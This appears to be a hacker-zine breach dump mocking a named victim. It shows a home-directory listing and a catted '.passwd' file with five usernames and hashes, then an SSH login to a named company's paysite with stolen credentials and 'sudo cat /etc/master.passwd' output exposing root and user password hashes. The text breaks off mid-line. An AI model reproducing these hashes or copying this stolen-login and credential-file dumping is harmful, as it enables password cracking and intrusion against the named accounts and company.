-rw-r--r-- 1 dvdman dvdman 797 Mar 30 2005 .profile
-rw------- 1 dvdman dvdman 276 Mar 30 2005 .rhosts
-rw-r--r-- 1 dvdman dvdman 975 Mar 30 2005 .shrc
drwx------ 2 dvdman dvdman 512 Jul 9 14:54 .ssh
drwxr-xr-x 2 dvdman dvdman 512 Aug 24 14:54 logs
-rw-r--r-- 1 dvdman dvdman 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxr-xr-x 11 dvdman dvdman 512 Jul 11 14:16 psybnc
drwxr-xr-x 3 dvdman dvdman 512 Jun 30 2005 psybnc-spoof
drwxr-xr-x 8 dvdman dvdman 1024 Dec 8 13:43 public_html
$ cat .passwd
johnh:jGNBUNbheu.hM
flatline:9YJnrb8rqva/M
elesha:O79xM1OkQgqtk
duck:K6145zM08.5EM
kevin:cfBzVeHe4j/OQ
plz n0t3, john.bangbros.com was l33tsecurity.com unt1l dvdman w4z f1r3d.
4ls0 n0t3 th4t h0no d1d n0t t0uch bangbros. w3 l0v3 p0rn. d0nt hurt th3
p0rn!
-~-~-~
%ssh paysite.bangbros.com -l johnh
Password:
Last login: Sun Jan 1 08:49:49 2006
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.8-RELEASE (GENERIC) #0: Thu Apr 3 10:53:38 GMT 2003
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are
unfamiliar with FreeBSD's directory layout, please refer to the hier(7)
man page. If you are not familiar with man pages, type `man man'.
You may also use /stand/sysinstall to re-enter the installation and
configuration utility. Edit /etc/motd to change this login announcement.
-bash-2.05b$ sudo cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:$1$SfL/0Uq8$E.Fop5NEh96mT0.hBZH4Q0:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
josh:$1$wLtfxD/T$XhYx.u4qVXlJh940I7/u2/:1003:1003::0:0:Josh:/home/josh:/usr/local/bin/bash
bangbros:$1$QNtXkAf7$fkEEnymX.iMzCKJfnUvyX1:501:501::0:0:BangBros.com, Inc.:/home/bangbros:/usr/local/bin/bash
mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin
johnh:t0qR
Comments